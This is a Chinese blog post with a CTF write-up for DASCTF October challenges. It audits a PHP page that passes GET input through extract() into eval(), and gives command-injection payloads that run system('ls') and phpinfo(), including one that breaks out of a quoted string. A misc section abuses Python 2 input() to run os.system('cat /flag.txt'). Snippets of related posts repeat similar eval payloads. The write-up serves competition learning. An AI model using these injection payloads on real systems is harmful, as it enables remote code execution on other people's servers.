DASCTF Oct X web

最新推荐文章于 2024-04-21 11:16:34 发布
最新推荐文章于 2024-04-21 11:16:34 发布
阅读量197 收藏
点赞数
文章标签: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/121305475
版权

文章目录

Web 欢迎来到魔法世界

打开容器,即进行php代码审计

<?php
highlight_file('index.php');

extract($_GET);//将GET方式传递的参数赋值
error_reporting(0);
function String2Array($data)//eval那里存在命令执行
{
    if($data == '') return array();
    @eval("\$array = $data;");
    return $array;
}


if(is_array($attrid) && is_array($attrvalue))//需要传入的参数都是数组
{
	//这段代码我总结是一个php代码闭合的过程
        $attrstr .= 'array(';
        $attrids = count($attrid);
        for($i=0; $i<$attrids; $i++)
        {
            $attrstr .= '"'.intval($attrid[$i]).'"=>'.'"'.$attrvalue[$i].'"';
            if($i < $attrids-1)
            {
                $attrstr .= ',';
            }
        }
        $attrstr .= ');';
}

String2Array($attrstr);

我的解法

但是比赛的时候,我刚开始一直在想中间那一段代码需要怎么构造,才能够命令执行,审了好大会儿,然后忽然发现,如果下面这个判断不成立的话, 那么就不用进行构造了

f(is_array($attrid) && is_array($attrvalue))

而代码的开头有extract($_GET);,可以直接进行赋值,所以我们可以直接传参attrstr

?attrstr=system('ls');

在这里插入图片描述
哈哈哈,回显表明方法可行,然后查看根目录/,发现有个flag.sh,价值不大。。。。。
查看phpinfo(),可以找到flag

?attrstr=phpinfo();

在这里插入图片描述

师傅的wp

之后和Cubestone师傅交流的时候,师傅用的比较正规的解法,学习一下

?attrid[]=1&attrvalue[]=");phpinfo();$a=("

有几个要注意的地方

  1. count()函数返回数组中元素的个数,那么attrid数组,传一个元素进去即可
$attrids = count($attrid);
  1. payload中的前两个参数是数组形式
  2. 需要闭合",payload中最后的$a=(“就是为了闭合”

Misc WELCOME DASCTFxJlenu

nc连接

nc node4.buuoj.cn 29020

然后利用python2的input漏洞(我把它和python的模板注入联系在一起了)

__import__('os').system('ls /')
发现flag.txt
__import__('os').system('cat /flag.txt')

得flag
在这里插入图片描述

Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OReilly Mining the Social Web 2nd Edition Oct-448页
06-01
OReilly Mining the Social Web 2nd Edition Oct-448页
oct 处理代码
12-10
oct 光学相干层析 图像的读取 matlab 代码 用于对皮下组织的呈现 代码
DASCTF X GFCTF 2024|四月开启第一局
最新发布
qq_61670993的博客
04-21 875
简单题
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 338
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
全国农信银CTF流量分析(凯撒会分析流量吗)
yoyo_573的博客
06-30 322
流量分析,时间盲注,题目提示了凯撒密码。转换下就得到了结果。
2022DASCTF MAY 出题人挑战赛 misc
mumuzi的博客
05-22 2808
MAYMISC
[DASCTF 7月赛] 复现
qq_61768489的博客
08-17 301
压缩包密码就是上面 的admin密码550f37c7748e。一个png ,用zsteg打开能看见有个zip,提取出来。FTK Imager 打开后Mount 该文件。上面也得到了密文U2Fs.... 是AES密文。再用efdd 打开,配合pc.raw挂载。这串数字是八进制 ,也可直接ciphey。得到了密钥 358daebef0b7d。文件名是thes3cret。访问后有源码,有过滤。...
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ (1).zip
12-07
DASCTF 吉林工师 欢迎来到魔法世界 ctf 真题
OCT.rar_OCT
09-24
**OCT技术详解** 光学相干断层扫描(Optical Coherence Tomography, OCT)是一种非侵入性的高分辨率成像技术,广泛应用于生物医学领域,尤其是眼科检查。它利用光的干涉原理,能够穿透生物组织,获取其内部的二维...
OCT技术调研.pdf
04-02
OCT技术调研.pdfOCT技术调研.pdfOCT技术调研.pdfOCT技术调研.pdfOCT技术调研.pdfOCT技术调研.pdf
DASCTF2022.07赋能赛 WEB题目复现
绮洛Ki1ro的博客
08-10 1075
其实7月时就想复现了,感觉题目质量挺高的,但奈何自己太菜看不懂就先搁置了。现在有能力回来填坑啦,但最后一题目前对自己理解起来还是有点难度,之后再研究研究。
2021DASCTF July X CBCTF 4th(wp)
qq_50589021的博客
08-25 822
CRYPTO Yusa的密码学签到——BlockTrick nc连接以后出来哪个就复制哪个,最后得到flag WEB ezrce 此题属于是YAPI接口管理平台RCE,利用csdn上找到的exp可以直接打: YAPI接口管理平台RCE复现-附exp cat flag 这个题目有点脑洞了 首先是访问/var/log/nginx/aeecss.log 得知真正的flag文件 然后写了一个ascii的不可见字符的fuzz字典生成脚本: <?php $myfile = fopen("ascii.txt"
2021西湖论剑web部分wp
fmyyy1的博客
11-21 1825
前言 快期末了 忙里偷闲打了西湖论剑,队伍第七,又被队友带飞了,web题目质量还可以 OA?RCE? 环境没有写的权限,本地有打通环境打不通的情况很多 之后在webmain/index/indexAction.php处 有个包含任意php文件 有个查看phpinfo的 看了之后开着register_argc_argv,尝试包含pearcmd payload 第一步 ?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2x
[DASCTF2022]三月月赛WriteUp Web部分全复现
Pysnow's Blog
04-11 3380
Web ezpop ezpop <?php highlight_file(__FILE__); class crow { public $v1; public $v2; function eval() { echo "crow::eval<br>"; echo new $this->v1($this->v2); } public function __invoke() { echo
DASCTF七月赛-web
Pr0m1se1n的博客
08-06 632
之前复现的了。。哎 Ezfileinclude 首页一张图片,看src就可以看出文件包含 验证了时间戳,参数t很容易能看出来 尝试用php://filter 伪协议读源码读不到,发现是用…/路径穿越 然后flag文件后缀不是是.php .txt .jpg什么的,就是flag!!! 直接来大师傅的脚本 import time import requests import base64 time = time.time() #获取时间戳(默认浮点型) t = int(time) #获取整型时间戳 pri
DASCTF Oct X 吉林工师 欢迎来到魔法世界~ WriteUp
七月的博客
10-26 2802
本篇文章原文:http://www.7yue.top/dasctf-oct-x-%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88-wp/ 雪殇杯好耶,顶碗人大胜利!!! WEB 迷路的魔法少女 ?attrid=0&attrstr=${eval(system('cat /etc/timezone'))} REVERSE 魔法叠加 pyc文件,改掉了magic,首先需要修复一下 前两位是版本信息,fuzz一下可知这是python3.7的pyc文件,正常python3.7的
菜鸡的DASCTF Sept X 浙江工业大学秋季挑战赛WP
克格莫
09-25 1275
1.签到 题目: #!/usr/bin/env python # -*- coding: utf-8 -*- from Crypto.Util.number import * import random flag=b'flag{******************}' n = 2 ** 256 e=bytes_to_long(flag) m = random.randint(2, n-1) | 1 c = pow(m, e, n) #m mod(e)n print('m = ' + str(m)) prin
DASCTF 2022.4
weixin_44687621的博客
04-25 2648
Web warmup_php 查看主页源码如下 <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; class Action{ public funct

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值